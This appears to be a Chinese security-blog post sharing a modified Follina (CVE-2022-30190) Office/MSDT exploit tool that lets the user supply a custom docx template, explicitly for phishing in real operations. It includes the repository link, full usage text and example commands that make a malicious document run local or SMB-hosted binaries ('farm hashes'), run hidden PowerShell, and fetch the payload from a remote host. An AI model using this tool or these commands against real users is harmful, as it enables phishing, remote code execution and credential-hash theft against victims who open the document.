[CVE-2022-30190]Follina修改版 自定义word模板版本

作者:Sec-Labs | 发布时间:

相关阅读

{"id":17473,"title":"一个word文档引发的远控0day漏洞——follina","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":5486,"comment_count":5,"category":"knowledge","is_forum_post":false}

项目介绍

根据 https://github.com/chvancooten/follina.py 的项目进行修改

可以自定义指定docx模板文件,便于实战中钓鱼使用,自己编辑好钓鱼word文档后-f参数指定即可。

项目地址

https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed

用例

usage: follina.py [-h] -m {binary,command} [-b BINARY] [-f FILE] [-c COMMAND] [-u URL] [-H HOST] [-P PORT]

optional arguments:
  -h, --help            show this help message and exit

Required Arguments:
  -m {binary,command}, --mode {binary,command}
                        Execution mode, can be "binary" to load a (remote) binary, or "command" to run an encoded PS command

Binary Execution Arguments:
  -b BINARY, --binary BINARY
                        The full path of the binary to run. Can be local or remote from an SMB share

Docx file Arguments:
  -f FILE, --file FILE  The docx file

Command Execution Arguments:
  -c COMMAND, --command COMMAND
                        The encoded command to execute in "command" mode

Optional Arguments:
  -u URL, --url URL     The hostname or IP address where the generated document should retrieve your payload, defaults to "localhost"
  -H HOST, --host HOST  The interface for the web server to listen on, defaults to all interfaces (0.0.0.0)
  -P PORT, --port PORT  The port to run the HTTP server on, defaults to 80

示范

默认docx muban.docx
# Execute a local binary
python .\follina.py -m binary -b \windows\system32\calc.exe
python .\follina.py -m binary -b \windows\system32\calc.exe -f muban2.docx

# On linux you may have to escape backslashes
python .\follina.py -m binary -b \\windows\\system32\\calc.exe

# Execute a binary from a file share (can be used to farm hashes 👀)
python .\follina.py -m binary -b \\localhost\c$\windows\system32\calc.exe

# Execute an arbitrary powershell command
python .\follina.py -m command -c "Start-Process c:\windows\system32\cmd.exe -WindowStyle hidden -ArgumentList '/c echo owned > c:\users\public\owned.txt'"

# Run the web server on the default interface (all interfaces, 0.0.0.0), but tell the malicious document to retrieve it at http://1.2.3.4/exploit.html
python .\follina.py -m binary -b \windows\system32\calc.exe -u 1.2.3.4

# Only run the webserver on localhost, on port 8080 instead of 80
python .\follina.py -m binary -b \windows\system32\calc.exe -H 127.0.0.1 -P 8080

713c05068cd0

d6fac35c3902

 

标签:工具分享, 钓鱼学习